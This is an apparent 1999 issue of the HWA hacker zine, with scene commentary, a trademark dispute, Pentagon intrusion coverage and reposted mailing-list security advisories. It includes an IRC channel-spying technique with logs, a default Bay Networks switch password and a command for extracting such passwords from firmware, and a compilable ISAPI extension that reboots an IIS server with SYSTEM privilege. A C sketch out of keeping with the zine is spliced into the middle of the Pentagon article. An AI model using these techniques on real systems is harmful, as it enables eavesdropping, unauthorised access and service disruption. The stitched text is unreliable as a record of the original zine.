Hacking, the original motto was to do no damage, but as time went by and people developed new skills, they decided that the original motto no longer applied to them. Thus the cracker was born. Hacking and Cracking are two different entities. You can not be both at the same time. You are either one or the other. (For those of you who consider yourselves as hackers or crackers but use other peoples' scripts to hack/crack, you are neither. Anybody can point and click their way along or run a program which does all the work for you, it doesn't require any talent.)

There are a few things that I find pointless in what the cracker community is doing:

First off: What the hell is the point of saying a server's security is shit if you don't help the server fix it??? What? Hack into it a second time? (I know there are a few groups out there who actually do help the servers they crack.
This part doesn't concern you.)

Second: Why the hell do people think that they are Eleet when they use a script to determine what systems are vulnerable? And exploit that vulnerability. Just because you know one or two tricks doesn't make you anything.

Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy if you can't spell, but please, half the time you sound like you never got a high school education!

Power can only corrupt. Crackers who develop their skills eventually lose control (though this isn't true for everybody) they can't help but feel destructive. Though there are different levels of destructiveness (as I see it):

A: Destroying all information, just for the heck of it.
B: Distributing information / programs to ruin a business.
C: Defacing information.
D: Replacing information, but leaving a back-up copy.
E: Destroying all information, for good purposes.

The last one (E) does fall into the category of cracking because it still is vandalism of information even though it's for a good purpose (Cracking the KKK server(s) and destroying everything would be considered a class E).

Ok, ok I know... This did kind of turn out to be a bit different than what it was supposed to be, but still I think I did manage to get a small message across...

// EOF

Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and tattooman among others ..

@HWA

02.0 From the editor.#9
     ~~~~~~~~~~~~~~~~~~

#include
#include
#include

main()
{
 printf ("Read commented source!\n\n");

 /*
  * Blech, fuck snow ... and overclocked chips that can't take the
  * heat even with oversize fans and sinks duct taped to them ... ;)
  *
  * Moving right along, thanks for the continued support everyone and tty next time...
  */
 printf ("EoF.\n");
}

w00t w00t w00t! ...

w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk.
1. A transcursion or transcendence into joy from an otherwise inert state
2.
Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 02.1 Demoniz trashcans his webboard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Less than a month after the very cool bikkel security site closed down demoniz has pulled the plug on his webboard which he left running after closing down the main news site. Citing DoS attacks and spam as being the #1 reasons, it turns my stomach just to think of this...pulled from help net security's site. http://net-security.org/ WEBBOARDS by deepcase, Monday 8th Mar 1999 on 1:34 pm CET Bikkel's Webboard which was first a project for a private webboard with user login and password is finally down. In an email i recieved from demoniz he said "The board is offline for good. I gave my best shot, but it didn't work. The ingoing Denial of Service attacks on our server, the spams and the threats made me so sick that I removed it. I wont provide a service for a scene which is being dominated by little kids." Net Security will think about setting up a new webboard, but we arent sure about this yet. As a side note, we've set up a 'webboard' that is published by the beseen company and it has seen no action as of yet, you might want to check it out and we can see how well it works (or doesn't as the case may be.) - Ed @HWA 03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Innerpulse.com... AntiOnline.com Threatens Legal Action Contributed by siko Thursday - March 04, 1999. 05:52PM GMT Following a rash of insults at AntiOnline.com, Founder John Vransisomething has threatened legal action against Innerpulse.com. 
Innerpulse has this statement for Mister AntiOnline: Talk your shit, grab your gat, call your click. But do not ever threaten Innerpulse with legal action unless you want some keys dropped.If you ain't ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck out of the ghetto. Don't try to tell me using the term 'antionline.com' is a violation of copyright laws. Its a fucking domain name. As for why we throw shit all over you name, this is a very good example of why. He went so far as to say the letter he sent me could not be reproduced without express written permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf on by. It would be the biggest bitch move in Internet history to launch a legal suit at opposition just because your feelings are hurt. Stop trying to be the Microsoft of the underground community. Nothing will be removed. Nothing will be discontinued. And I don't care if someone was stupid enough to invest 60 billion in you. Why don't you go to antihell.com. Punk ass. Yeah, I posted it, What's Up Now Monkey? http://innerpulse.com/jp.txt (The text from the above link appears in its entirety below - Ed) "
aka Siko:
       I am sending you this letter to officially request that the content that
       relates to AntiOnline currently posted at the following URL be removed
       promptly: http://www.innerpulse.com/

       By references in your pages, I am sure that you are aware that
       "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
       rights to.  The language used on your page is not only inflammatory, it is
       flat out libelous. That content, combined with references to "AntiOnline"
       is what has led me to write this letter.

       While comedic parody is a protected first amendment right, knowingly
       printing false, libelous information about a company, in the context of it
       being news, so that others may believe it to be fact, is not.  We have
       received several e-mails from individuals questioning whether some of the
       information posted on your page, is factual news, or fictional writing.

       Also, the re-print of trademarks which are the property of another
       company, without written authorization, do not fall under first amendment
       rights.

       By sending you this letter, I am hoping that we can settle this matter
       without me being forced to seek a legal remedy. However, if you are not
       willing to cooperate with my requests, I may very well be forced into
       finding legal recourses, which may include a civil lawsuit.  You will
       receive no further communications from me directly.  If the content is not removed
       within 24 hours, this matter will be handed over to my legal council.
       Legal action may be filed shortly there after to recover damages done to
       AntiOnline's trade and reputation.

       A copy of this letter has been sent "blind carbon" to several third party
       individuals, so that it may be established that I have given you
       opportunity to remove the content voluntarily.

       If you have any questions regarding my request, you may contact me via an
       e-mail to jp@antionline.com or by phone at (724)773-0940.

       I would like to thank you in advance for what I hope will be a prompt
       response to my requests.

       Very Truly Yours,
       Mr. John Vranesevich
      General Partner, AntiOnline

      --------------------------------------------------------------------------------
      This letter is copyright 1999, AntiOnline LLP
      Reprint without written authorization is strictly prohibited...

"

Our Reply to JayPee
http://innerpulse.com/jp-reply.txt

Hi,

After I saw the e-mail you sent to siko I wanted to give you my idea on this issue, as I provide web hosting for Innerpulse.com and occasionally work on the website. Response below.

> aka Siko:
>
> I am sending you this letter to officially request that the content that
> relates to AntiOnline currently posted at the following URL be removed
> promptly: http://www.innerpulse.com/

If you want to send an official letter, you don't use e-mail. You can redirect official letters to our main administrative NOC at:

[CubeSoft Communications]
Cp2, Rr2, H.a.m
Magdalen Islands, QC G0B 1K0
CANADA

> By references in your pages, I am sure that you are aware that
> "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold
> rights to. The language used on your page is not only inflammatory, it is
> flat out libelous. That content, combined with references to "AntiOnline"
> is what has led me to write this letter.

First of all, I think you should be consulting a lawyer about this. I did, and I can tell you that mentioning the name "AntiOnline" in a news article is not libelous; as we never even put a link to your website (which would have not been legally wrong either). Is mentioning "Microsoft" in a news article libelous? I don't think so.

> While comedic parody is a protected first amendment right, knowingly
> printing false, libelous information about a company, in the context of it
> being news, so that others may believe it to be fact, is not. We have
> received several e-mails from individuals questioning whether some of the
> information posted on your page, is factual news, or fictional writing.

We don't want to take responsibility of the stupidity of your website's visitors. Tell them to redirect their comments and question to contact@innerpulse.com.
My personal opinion is that it is quite obvious whether an article is true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse different.

> Also, the re-print of trademarks which are the property of another
> company, without written authorization, do not fall under first amendment
> rights.

Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from the INN features section. Do you seriously think I would have wasted my time recopying AntiOnline's frontpage entirely? This may be not in the scope of your technical skills, but that is actually a link to a CGI script which simply acts as a proxy - it prints information directly from AntiOnline.com, doing some word search/replaces in the process. By changing the parameter you can do the same with any other website.

> By sending you this letter, I am hoping that we can settle this matter
> without me being forced to seek a legal remedy. However, if you are not
> willing to cooperate with my requests, I may very well be forced into
> finding legal recourses, which may include a civil lawsuit. You will
> receive
> no further communications from me directly. If the content is not removed
> within 24 hours, this matter will be handed over to my legal council.
> Legal action may be filed shortly there after to recover damages done to
> AntiOnline's trade and reputation.

I've been in that situation before, just an advice: don't even think about this, this will pass as a violation of free speech. And by the way, who do you want to sue exactly?

> A copy of this letter has been sent "blind carbon" to several third party
> individuals, so that it may be established that I have given you
> opportunity to remove the content voluntarily.

I don't think so, John.

> If you have any questions regarding my request, you may contact me via an
> e-mail to jp@antionline.com or by phone at (724)773-0940.
>
> I would like to thank you in advance for what I hope will be a prompt
> response to my requests.
>
> Very Truly Yours,
> Mr. John Vranesevich
> General Partner, AntiOnline

@HWA

03.1 The FPSC-IRCD.txt advisory.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~

The FPSC-IRCD.txt advisory.
---------------------------
By: syg of the FPSC @3/7/98
ircd@FPSC.hemp.net
http://FPSC.hemp.net

Program affected: IRCD

Versions affected: All hybrid and other EFnet IRCD versions. Probably others.

Problem: According to the date of this file, there are a few bugs in hybrid IRCD and maybe others. I've checked DALnet's source and it seems theirs is fixed and not affected. The bug is in match.c of the source code and starts on line 204 at 'tolowertab[]'. Note the line that consists of the following: "'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238 in match.c to 'touppertab[]'. Note the line that reads: "'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and look at the two lines. If you notice, it takes the '{' char and defines its uppercase char as '[' along with defining '|' to '\', '}' to ']', and '~' to '^'. What this means is they're the same characters in channel names and nicknames. Now what can you do with this in such a way it would be a problem? You can spy on channels that consist of any one of those 8 characters below:

1) { --Defined as LowerCase [
2) [ --Defined as UpperCase {
3) } --Defined as LowerCase ]
4) ] --Defined as UpperCase }
5) | --Defined as LowerCase \
6) \ --Defined as UpperCase |
7) ~ --Defined as LowerCase ^
8) ^ --Defined as UpperCase ~

This problem and mIRC make a dangerous combination. Let's say a bunch of your friends hang in #mIRC] and you run BitchX. All you have to do is join #mIRC} and their mIRC clients won't see you join the channel which means you are a ghost and therefore are invisible. Another example would be... two people are in #Love^2 and you ran BitchX. All you would have to do is join #Love~2 and they won't see you join, therefore you can spy on their conversation all night long.
Now if one of the mIRC people happened to type "/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick list of the channel. That is also the same if someone joins the channel after you have joined, you will show up in their names list therefore it will put you in their nick list in the channel window. Be creative and have fun.

Logs: The "->->->" is me telling you what's going on.

->->-> In mIRC I typed /join #[ with the nick mIRC-1
*** Now talking in #[
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ @mIRC-1
#[ End of /NAMES list.
#[ created on Thu Feb 25 14:13:45
->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2
*** Now talking in #{
->->-> No one is in the channel but me in the nick list.
->->-> Then I looked in my status window and got the join info.
#[ mIRC-2 @mIRC-1
#{ End of /NAMES list.
#[ +
#[ created on Thu Feb 25 14:13:45
->->-> NOTE: I can't see mIRC-1 in the nick list in the channel.
->->-> I also can't see mIRC-2 in mIRC-1's nick list.
->->-> So basically it's like two different channels when you are in mIRC.
->->-> Let's now bring bitchX into play...
->->-> In BitchX under the nick BitchX-1 i typed /join #[
BitchX-1 [test@FPSC.hemp.net] has joined #[
[Users(#[:3)]
[ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ]
Channel #[ was created at Thu Feb 25 14:13:45 1999
BitchX: Join to #[ was synced in 0.391 secs!
->->-> Now under mIRC-1's client I saw...
*** BitchX-1 (test@FPSC.hemp.net) has joined #[
->->-> Which I should have because we are both in #[
->->-> But on the other hand, under mIRC-2's client( The one in #{ )...
->->-> I didn't see BitchX-1 join.
->->-> And as you can see, BitchX-1 sees mIRC-2 in the channel #[
->->-> Now let me type with all three of them.
->->-> Under all three clients I will type their nick and chan to the channel.
->->-> Under BitchX-1's client I saw all three clients talk...
mIRC-1 #[
mIRC-2 #{
BitchX-1 #[
->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[)
mIRC-1 #[
BitchX-1 #[
->->-> Under mIRC-2's client I saw myself type only ( I'm in #{ )
mIRC-2 #{
->->-> As you can see mIRC-2 is being spied on by the BitchX client.
->->-> End of logs.

Solution: The fix would be to simply edit /src/match.c of the source code. DALnet seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff need any ideas. We all hope to see this fixed in your next release of hybrid.

Final Notes: IRCD coders and staff members of all networks and all IRCD versions need to check your source for this bug and fix it before it gets abused... maybe it was you in #^locals^ giving your phone number out to a friend which was being spied on by another local enemy. Other than that, everyone keep up the good work and so long. Also, thanks to sate for helping me test this out.

Questions/jobs/info/etc: ircd@FPSC.hemp.net

-syg

@HWA

04.0 Pentagon under attack
     ~~~~~~~~~~~~~~~~~~~~~

March 7th, 1999
From http://www.hackernews.com/

Pentagon investigates Russian cyberattacks
contributed to HNN by Bronc

A probe has been launched into recent efforts of crackers attempting to access Pentagon computer systems. Pentagon officials are unsure if this is a coordinated attack or the work of separate individuals. Early indications show that many of the attacks have originated in Russia and may have had the assistance of an insider. No classified networks have yet been breached. U.S. Deputy Defense Secretary John Hamre has been quoted as saying "It is a major concern."

(Ed Note: This is the same John Hamre who last year was quoted as saying "This is the most coordinated attack we have seen to date" when referring to attacks on government systems by three teenagers.)
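Going back to the FPSC-IRCD advisory in section 03.1 above: the invisible join comes down to the server and the client folding channel names with different tables. The C sketch below is an added example, not code from hybrid's match.c or from any IRC client; its function names and sample channel list are made up for illustration, and it assumes (as the advisory's logs suggest) that the affected client matches JOINs to its channel windows using plain ASCII case folding.

```c
#include <stdio.h>
#include <string.h>

typedef unsigned char (*fold_fn)(unsigned char);

/* Plain ASCII folding: only A-Z change. Assumed here to be what the
 * affected client uses when matching a JOIN to an open channel window. */
unsigned char fold_ascii(unsigned char c)
{
    return (c >= 'A' && c <= 'Z') ? (unsigned char)(c + 32) : c;
}

/* Folding as the advisory describes the server's tolowertab[]:
 * A-Z plus '[' -> '{', '\' -> '|', ']' -> '}', '^' -> '~'. */
unsigned char fold_ircd(unsigned char c)
{
    switch (c) {
    case '[':  return '{';
    case '\\': return '|';
    case ']':  return '}';
    case '^':  return '~';
    default:   return fold_ascii(c);
    }
}

/* 1 if the two names are the same under the given folding, else 0. */
int name_equal(const char *a, const char *b, fold_fn fold)
{
    for (; *a && *b; a++, b++)
        if (fold((unsigned char)*a) != fold((unsigned char)*b))
            return 0;
    return *a == *b;
}

/* Write the server-side canonical form of src into dst.
 * Returns 0 on success, -1 if dst is too small. */
int canon_channel(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > dstlen)
        return -1;
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)fold_ircd((unsigned char)src[i]);
    dst[n] = '\0';
    return 0;
}

/* Count pairs the server treats as one channel but an ASCII-folding
 * client treats as two: the condition behind the "ghost" join. */
int count_split_pairs(const char *const *names, int n)
{
    int hits = 0;
    for (int i = 0; i < n; i++)
        for (int j = i + 1; j < n; j++)
            if (name_equal(names[i], names[j], fold_ircd) &&
                !name_equal(names[i], names[j], fold_ascii))
                hits++;
    return hits;
}

/* Constructed sample: channel names from the advisory's examples plus
 * one pair that differs only in letter case (not a split pair). */
const char *const SAMPLE_NAMES[] = {
    "#mIRC]", "#mIRC}", "#Love^2", "#Love~2",
    "#HWA.hax0r.news", "#hwa.hax0r.news"
};
const int SAMPLE_COUNT = (int)(sizeof SAMPLE_NAMES / sizeof SAMPLE_NAMES[0]);

int main(void)
{
    char canon[64];
    for (int i = 0; i < SAMPLE_COUNT; i++) {
        if (canon_channel(canon, sizeof canon, SAMPLE_NAMES[i]) == 0)
            printf("%-18s -> %s\n", SAMPLE_NAMES[i], canon);
    }
    printf("split pairs: %d\n",
           count_split_pairs(SAMPLE_NAMES, SAMPLE_COUNT));
    return 0;
}
```

A client or bot that keys its channel state on the canon_channel() form attaches a JOIN for #mIRC} to its #mIRC] window instead of dropping it, which closes the gap from the client side while the server table stays as it is.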
Follow up here: http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html http://www.msnbc.com/news/246801.asp http://www.smh.com.au/news/9903/05/breaking2/news1.html And from Innerpulse.com; www.innerpulse.com United States: Cyberwar? Contributed to Innerpulse by siko Sunday - March 07, 1999. 06:10PM GMT Innerpulse has decided not to join the media inflated 'Cyberwar' reporting until today. We have been doing extensive research and have discovered some exclusive details. We all know the so called 'facts'. Coordinated attacks on certain servers have officials at the Pentagon looking for answers, and quickly. What certain people forget, is that the man who said this is the most organized attack to date, is also the man that said a 16 year old kid named 'Makeveli' had also launched an extremely organized attack on government servers. For those who aren't into the urban musical subculture, Makeveli most likely came from the popular rapper, Tupac's influence. They have stated the attacks are coming from Canada and Thailand amongst others. Yet they can not trace any further. Sorry, if you can tell the country than you have the IP, and the ability to find the source. The United States is not at Cyberwar with anyone but the media, who took a couple of failed hack attempts and turned it into World War III. Innerpulse has conducted various interviews and can now finger the source of this terror. His name is John Vranesevich, which traces back to packetz.antionline.com. In an effort to get more publicity for breaking a story, he blew up a situation leading many respected news outlets into believeing this was actually as blown out of proportion as he made it sound. And on top of that, they pick Hamre, the man who called an Undernet hacker named 'Makeveli', a serious threat the the United States National Security. The Pentagon may be experiencing more attacks lately. 
This is not blown out of proportion. But if you take a moment to question the motives of people who would attempt to crack into a government server.. Perhaps because it gains you recognition and fame as it has done for so many in the past? This is the same reason antionline.com gets lots of crack attempts every day, because almost everyone in the 'hacker' community wants to be known for breaking the site that sold out. The United States is not currently involved in a Cyber War, never has been, and most likely will not be in any of our reader's lifetimes. But, if someone really cracks a Pentagon server and fires a missile at me, boy won't I feel silly. And a fairly intelligent article with little FUD from ABC news... http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html Pentagon Attacks Overblown? Hackers Complain Government Computers Over-Sensitive By Michael J. Martinez ABCNEWS.com March 9 Last week, the Pentagon reported that over the last several months its computer systems have withstood an unprecedented and concerted series of external attacks. U.S.-based hackers might simulate an attack from abroad by routing their signals through a series of far-flung servers. (ABCNEWS.com) Deputy Defense Secretary John Hamre confirmed the attacks, calling them a major concern. Pentagon officials stated that the electronic infiltrations have come from abroad most likely Russia. To Pentagon watchers, and to members of the loosely knit hacker fraternity in the United States, those claims sounded familiar. Terrorists or Teens? Last February, Hamre announced that the Pentagon was undergoing the most intense, coordinated cyberattack it had ever seen. Over a two-week period, unknown hackers launched coordinated attacks against hundreds of military domains and servers. After weeks of investigation, the culprits were nabbed. 
They turned out to be an 18-year-old Israeli computer enthusiast with a lot of time on his hands, and two teenagers from California who were using readily available software tools downloaded from the Internet to discredit the Pentagon’s computer security. No hackers claimed credit for the latest assaults; there was no bragging in IRC chat rooms or on Web pages, as typically happens after well-publicized computer attacks on government systems. That could mean a number of different things, says Dr. Peter Tippett, president of ISCA, Inc., a computer security firm. The attacks aren’t that bad, the person doing it doesn’t want to take credit, or the attacks are coming from overseas. The latest assaults could have come from foreign governments, terrorist organizations or from the proverbial mischievous teenager. Recon vs. Frontal Assault What exactly constitutes an attack? Hackers customarily scan remote computer systems, looking for security holes through which to send or retrieve data. Tools for such scans are readily available for downloading from the Internet. These scanners basically take known holes and hit a server, one after another, asking it if these holes are open, says an independent hacker known as Bronc Buster. They may or may not be there, but as far as logs on systems will show, unless you are an experienced admin and can tell the difference, you are being attacked. The Pentagon, however, does not differentiate between scans, which is essentially cyberspace reconnaissance, and full attacks, when a malicious system cracker actively attempts to break through security. Tippett points out that scans are useful for later attack, and that determined hackers have found ways to conduct scans without setting off alarms. Most servers have thousands of accounts, and thus thousands of entry points. If a hacker takes his time, and only pings a few entry points every so often, he can usually avoid notice. 
In recent congressional testimony, Hamre said Defense Department computers are attacked upwards of 60 times per week, with about 10 such attacks requiring additional investigation. He did not differentiate between scans or infiltration attempts. From Russia With Love The theory that the recent attacks came from Russia is also questionable. When it comes to the Internet, geography quickly becomes irrelevant. Hacking tools, some of which are readily available online, could allow a would-be hacker to fake his own locale information, or channel his attack through servers all around the world. I don’t know how the Pentagon would know where the attacks come from, Tippett says. If you have access to enough servers, it’s relatively easy to re-route your connection to make it appear you’re in Russia, when you could just be down the street. Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House Armed Services Committee where Hamre testified, acknowledges that the starting point of the recent computer assaults still in doubt. But he contends the new attacks represent a new kind of warfare, in which less powerful nations could gain an edge against the United States by hacking into and knocking out key computer systems. This appears to be a coordinated effort to break into our computer system, and we not giving the problem the kind of visibility it needs, Weldon says. This Y2K thing is a piece of cake compare to this. OXBlood Ruffin, foreign minister for the hacker group Cult of the Dead Cow, has another view. It smells like someone is looking for increased budgets, Ruffin wrote in an e-mail, calling Hamre’s alarms a typical crying game from the military. ‘Hacking’ Into a Government Computer According to a Philadelphia-based hacker who calls himself El Diablo, government computers are far too quick to register an attack. El Diablo, affiliated with the HologramNation hacker group, should know: he accessed the White House Web server. 
Instead of using a Web browser, El Diablo accessed the whitehouse.gov host address via Telnet. Telnet is a common way for a user to log directly into a server, accessing the server’s systems remotely.

Once dialed in, El Diablo encountered the following warning:

You are about to access a U.S. Government computer system. Access to this system is restricted to authorized users only. Anyone who accesses this system without authorization, or exceeds authorized access, could be subject to a fine or imprisonment, or both, under Public Law 98-473.

The message went on to say that the user was being monitored. The computer then asked for a username and password, at which point El Diablo exited.

What this seems to say is that I just ‘hacked’ into the government computers, he says. The hackers [accessing Pentagon computers] could have simply done that, and the government could have blown this waaaaaay out of proportion.

Many people Telnet into their work computers it’s not some obscure hacker tool. Yet the White House says what El Diablo did is a potential attack.

I’m sure lots of people Telnet into that server, either to just have a look, or they access it by mistake, and that’s OK, said White House spokesman Mark Kitchens. But that is still considered an attempt at breaching security.

@HWA

04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 5 Mar 1999 12:19:59 -0800
From: JEK
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Cheyenne InocuLAN for Exchange plain text password still there

This dates back to Ron Watkins' post on 12/16/98 regarding the plain text account name/password left in the exchverify.log file by the installation of Cheyenne's Anti-Virus Agent for Exchange.

Quote from Ron:

"I was called on Monday by Brian Linton at Computer Associates.
He says that the plaintext admin password was put into c:\exchverify.log by earlier versions of the Arcserve Exchange client, but that build 57 (the most recent version) puts only the length there. It does not erase that file as new installs are done, but rather appends, which is why some folks still had that plaintext password even after installing the most recent build."

I am currently testing AV Agent for Exchange and installed what I was told was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5 server running InocuLAN for NT 4.0 (build 375). This was a fresh build and *not* upgraded from earlier versions of any software. The exchverify.log file is still there and still contains the account name and password in clear text - NOT merely the length as stated above.

JEK, MCSE

@HWA

04.2 Default passwords in Bay networks switches
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 10 Mar 1999 14:48:58 -0800
From: Jan B. Koum
To: BUGTRAQ@netspace.org
Subject: Default password in Bay Networks switches.

Ok.. so you would think after 3Com $%#& up last year of inserting default password into firmware vendors would learn their lesson? [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]

Hah! Welcome to the world of strings and Bay Networks firmware files. I have looked at some bay networks switches and see that the following have default password of "NetICs"

BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10
BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15

These however I was not able to find defaults for:

BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2
Bay Networks BayStack 303 Ethernet Switch
BayStack 28115/ADV Fast Ethernet Switch

If you have firmware images for the above, just

% strings *.img | grep -B5 "Invalid Password"

Something similar to this command might give you the passwd.

Of course I don't have to tell you about how bad it is when someone can control your network infrastructure (switches).
I don't have much experience with Bay hardware (in fact, I have none - someone at work just asked me to help them get into a switch for which they forgot the password). If someone can shed some light on this topic, it would be great.

And yes, I consider this to be a backdoor - wouldn't you call it a backdoor if Solaris had default password for root logins? How can vendors in 1999 even THINK about something as stupid as inserting a default password like this into a switch!?!? Granted - I am almost sure Bay didn't have evil intentions for the use .. but still. I am speechless.

-- Yan

P.S. - Greetz to the inhabitants of #!adm and #!w00w00

------------------------------------------------------------------------------

Date: Wed, 10 Mar 1999 17:06:05 -0700
From: Dax Kelson
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.

On Wed, 10 Mar 1999, Jan B. Koum wrote:

> Ok.. so you would think after 3Com $%#& up last year of inserting
> default password into firmware vendors would learn their lesson?
> [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant]
>
> Hah! Welcome to the world of strings and Bay Networks firmware
> files. I have looked at some bay networks switches and see that
> the following have default password of "NetICs"

The Bay Networks case number for this bug/oversight is: 990310-614

Normally "backdoor" passwords on Bay gear only work through the console.

Dax Kelson
Internet Connect, Inc.

------------------------------------------------------------------------------

Date: Wed, 10 Mar 1999 17:16:53 -0800
From: Jon Green
To: BUGTRAQ@netspace.org
Subject: Re: Default password in Bay Networks switches.

> And yes, I consider this to be a backdoor - wouldn't you call it
> a backdoor if Solaris had default password for root logins?
> How can vendors in 1999 even THINK about something as stupid as
> inserting a default password like this into a switch!?!?
> Granted - I am almost sure Bay didn't have evil intentions for
> the use .. but still. I am speechless.

This was fixed in version 2.0.3.4 of the BS350 code last November.
The backdoor is still there for console access, but not for telnet. This
problem only affected the Baystack 350T and 350F, it did not affect
the 350-24T or 450. Also, note that the 350 has always had the ability to
limit telnet logins to certain source addresses; it is recommended that that
feature be used. Software upgrades for the 350 can be found at
http://support.baynetworks.com under Software. If you don't have a support
contract, call (800) 2LANWAN.

-Jon

-------------------------------------------------------------------
Jon Green                          4301 Great America Pkwy
Senior Competitive Test Engineer   Santa Clara, CA 95054
Nortel Networks                    (408) 495-2618 Voice
jogreen@nortelnetworks.com         (408) 495-4540 Fax
-------------------------------------------------------------------

@HWA

04.3 ISAPI Exploit code
     ~~~~~~~~~~~~~~~~~~

Date: Tue, 9 Mar 1999 10:54:47 -0500
From: Fabien Royer
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM

> -----Original Message-----
> From: Patrick CHAMBET [mailto:pchambet@club-internet.fr]
> Sent: Tuesday, March 09, 1999 5:27 AM
> To: Fabien Royer
> Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
> Subject: Re: ISAPI Extension vulnerability allows to execute code as
> SYSTEM
>
>
> Any proof ? Any sample ? Any work around ?
> How can we test our servers ?

Using VC++, create an ISAPI extension project and call it CRbExtension.
Replace GetExtensionVersion() and Default() with the code below. Compile it
to something simple, like rb.dll. Place it on your web server and invoke it
from your browser like this http://your.machine.name/scripts/rb.dll?

Note: if you are using IE4.0, don't call this from the machine that is
running the web server otherwise, the next time you log in, IE will recall
the last URL and you'll reboot again.
The workaround is to NEVER give users (or customers) the ability to use
ISAPI extensions if you allow them to upload CGIs to customize their home
page. An .exe on the other hand is much safer (is coded correctly).

Fabien.

BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer)
{
    HANDLE hToken;              // handle to process token
    TOKEN_PRIVILEGES tkp;       // pointer to token structure

    // Get the current process token handle so we can get shutdown
    // privilege.
    OpenProcessToken(GetCurrentProcess(),
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);

    // Get the LUID for shutdown privilege.
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
        &tkp.Privileges[0].Luid);

    tkp.PrivilegeCount = 1;     // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Get shutdown privilege for this process.
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
        (PTOKEN_PRIVILEGES) NULL, 0);

    ExitWindowsEx(EWX_REBOOT,0);

    // Disable shutdown privilege.
    tkp.Privileges[0].Attributes = 0;
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
        (PTOKEN_PRIVILEGES) NULL, 0);

    // Call default implementation for initialization
    CHttpServer::GetExtensionVersion(pVer);

    // Load description string
    TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1];
    ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER,
        sz,HSE_MAX_EXT_DLL_NAME_LEN));
    _tcscpy(pVer->lpszExtensionDesc, sz);
    return TRUE;
}

void CRbExtension::Default(CHttpServerContext* pCtxt)
{
    StartContent(pCtxt);
    WriteTitle(pCtxt);
    *pCtxt << _T("Reboot\n");
    EndContent(pCtxt);
}

>
> Patrick Chambet
> IBM Global Services
>
>
> >There's a vulnerability in IIS (and other WEB servers executing
> as SYSTEM)
> >that allows to execute an ISAPI extension in the security context of the
> >server itself instead of the security context of IUSR_WHATEVER.
> How is this
> >possible: when the server loads an ISAPI extension the first
> time, it calls
> >GetExtensionVersion(). During the call to this function, an attacker can
> >execute any code as SYSTEM. This is a problem if you're an ISP doing
> hosting
> >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc.
> ) because
> >any user allowed to place a "CGI" on the server can take over. Of course,
> >this problem is not limited to ISPs.
> >Fabien.

-=-

Prior Discussion & further details ;

Date: Mon, 8 Mar 1999 11:27:48 -0500
From: Fabien Royer
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM

There's a vulnerability in IIS (and other WEB servers executing as SYSTEM)
that allows to execute an ISAPI extension in the security context of the
server itself instead of the security context of IUSR_WHATEVER. How is this
possible: when the server loads an ISAPI extension the first time, it calls
GetExtensionVersion(). During the call to this function, an attacker can
execute any code as SYSTEM. This is a problem if you're an ISP doing hosting
with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because
any user allowed to place a "CGI" on the server can take over. Of course,
this problem is not limited to ISPs.

Fabien.

--------------------------------------------------------------------------------

